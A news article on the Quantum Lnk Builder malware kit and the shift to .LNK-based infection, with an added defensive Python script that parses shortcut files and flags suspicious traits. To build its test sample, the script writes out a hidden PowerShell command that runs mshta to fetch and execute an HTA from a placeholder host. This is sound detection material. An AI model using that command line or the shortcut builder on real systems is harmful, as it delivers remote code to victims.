The Cyber Security News
New ‘Quantum’ Builder Lets Attackers Easily Create Malicious Windows Shortcuts

June 24, 2022

A new malware builder that allows cybercriminals to create malicious Windows shortcut (.LNK) files has been spotted for sale on cybercrime forums.

Dubbed Quantum Lnk Builder, the software makes it possible to spoof any file extension and choose from over 300 icons, not to mention support for UAC and Windows SmartScreen bypass as well as "multiple payloads per .LNK" file. Also available are capabilities to create .HTA and disk image (.ISO) payloads.

Quantum Builder is available for lease at different price points: €189 a month, €355 for two months, €899 for six months, or as a one-off lifetime purchase for €1,500.


".LNK files are shortcut files that reference other files, folders, or applications to open them," Cyble researchers said in a report. "The [threat actor] leverages the .LNK files and drops malicious payloads using LOLBins [living-off-the-land binaries]."

Early evidence of malware samples using Quantum Builder in the wild is said to date back to May 24, masquerading as harmless-looking text files ("test.txt.lnk").

"By default, Windows hides the .LNK extension, so if a file is named file_name.txt.lnk, then only file_name.txt will be visible to the user even if the show file extension option is enabled," the researchers said. "For such reasons, this could be an attractive option for TAs, using the .LNK files as a disguise or smokescreen."

Launching the .LNK file executes PowerShell code that, in turn, runs an HTML Application ("bdg.hta") file hosted on Quantum's website ("quantum-software[.]online") using MSHTA, a legitimate Windows utility that's used to run HTA files.
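The chain described above (a shortcut that hides its real extension, points at PowerShell, and hands off to mshta.exe for a remote HTA) can be triaged statically without detonating anything. The parser below is an added example written for this page, not Cyble's or Quantum Builder's code. It follows the MS-SHLLINK on-disk layout, fabricates a .lnk blob that mimics the described chain (the host quantum-example.invalid, the icon path and the LOLBin list are assumptions, and the bytes are constructed here rather than taken from a real sample), and reports the indicators a responder would look for. One caveat worth knowing: Explorer hides ".lnk" because of the NeverShowExt value on the lnkfile file class, not because of the "Hide extensions for known file types" setting, which is why the double-extension check keys on the file name stem rather than on any Explorer option.

```python
"""Static triage of a Windows Shell Link (.LNK): parse the header and
StringData per MS-SHLLINK, then flag shortcuts whose target or arguments
launch a LOLBin such as powershell.exe or mshta.exe.
Added example for this page; the .lnk bytes are constructed below to mimic
the chain described in the article, not an actual Quantum Builder sample."""
import struct

HEADER_SIZE = 0x4C
# CLSID 00021401-0000-0000-C000-000000000046 in on-disk (little-endian) layout
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which sections follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
# StringData entries appear in this fixed order when their flag bit is set
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight

# Living-off-the-land binaries commonly chained from malicious shortcuts (assumed list)
LOLBINS = ("mshta", "powershell", "pwsh", "cmd.exe", "rundll32", "regsvr32",
           "wscript", "cscript", "certutil", "bitsadmin")


def _string_data(s):
    """StringData entry: character count (2 bytes) + UTF-16LE chars, no terminator."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path, arguments, icon_location=None, show_command=1):
    """Construct a minimal .lnk: header + StringData only (no IDList/LinkInfo).
    Used here solely to fabricate test input."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if icon_location is not None:
        flags |= HAS_ICON_LOCATION
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII",
        flags, 0x20,         # LinkFlags, FileAttributes (FILE_ATTRIBUTE_ARCHIVE)
        0, 0, 0,             # CreationTime, AccessTime, WriteTime
        0, 0, show_command,  # FileSize, IconIndex, ShowCommand
        0, 0, 0, 0)          # HotKey, Reserved1, Reserved2, Reserved3
    body = _string_data(relative_path) + _string_data(arguments)
    if icon_location is not None:
        body += _string_data(icon_location)
    return header + body


def parse_lnk(data):
    """Return LinkFlags, ShowCommand and the StringData strings of a .lnk blob."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            info[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return info


def triage(filename, data):
    """Return (parsed fields, list of findings) for one shortcut file."""
    info = parse_lnk(data)
    findings = []
    # Explorer drops ".lnk" (NeverShowExt on the lnkfile class), so whatever
    # extension remains in the stem is what the victim actually sees.
    stem = filename[:-4] if filename.lower().endswith(".lnk") else filename
    if "." in stem:
        findings.append(f"double extension: displayed as '{stem}'")
    cmdline = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    for lolbin in LOLBINS:
        if lolbin in cmdline:
            findings.append(f"launches LOLBin: {lolbin}")
    if "http" in cmdline or ".hta" in cmdline:
        findings.append("remote content / HTA referenced in arguments")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window hidden via ShowCommand=SW_SHOWMINNOACTIVE")
    return info, findings


# Constructed sample modelled on the article's chain: text-file-looking name,
# PowerShell target, mshta fetching an HTA from a placeholder host.
SAMPLE_NAME = "test.txt.lnk"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -ep bypass -c "mshta http://quantum-example.invalid/bdg.hta"',
    icon_location=r"%SystemRoot%\System32\imageres.dll",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    fields, hits = triage(SAMPLE_NAME, SAMPLE_LNK)
    print("target   :", fields["relative_path"])
    print("arguments:", fields["arguments"])
    for hit in hits:
        print(" !", hit)
```

On a real host the same `triage()` can be pointed at every .lnk under a user's Downloads or mail attachment directories. The parser deliberately skips the LinkTargetIDList and ExtraData blocks; production tooling should walk those too, since a builder can place the real target in the IDList and leave RelativePath empty.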

Quantum Builder is said to share ties with the North Korea-based Lazarus Group based on source code-level overlaps in the tool and the latter's modus operandi of leveraging .LNK files to deliver additional-stage payloads, indicating its potential use by APT actors in their attacks.


The development comes as the operators behind Bumblebee and Emotet are shifting to .LNK files as a conduit to trigger infection chains, following Microsoft's decision to disable Visual Basic for Applications (VBA) macros by default across its products earlier this year.

Bumblebee, a replacement for the BazarLoader malware first spotted in March, functions as a backdoor designed to give attackers persistent access to compromised systems and as a downloader for other malware, including Cobalt Strike and Sliver.

The malware's capabilities have also made it a tool of choice for threat actors, with 413 incidents of Bumblebee infection reported in May 2022, up from 41 in April, according to Cyble.

"Bumblebee is a new and highly sophisticated malware loader that employs extensive evasive maneuvers and anti-analysis techniques, including complex anti-virtualization techniques," the researchers said. "It is likely to become a popular tool for ransomware groups to deliver their payload."



Some elements of this article are sourced from thehackernews.com.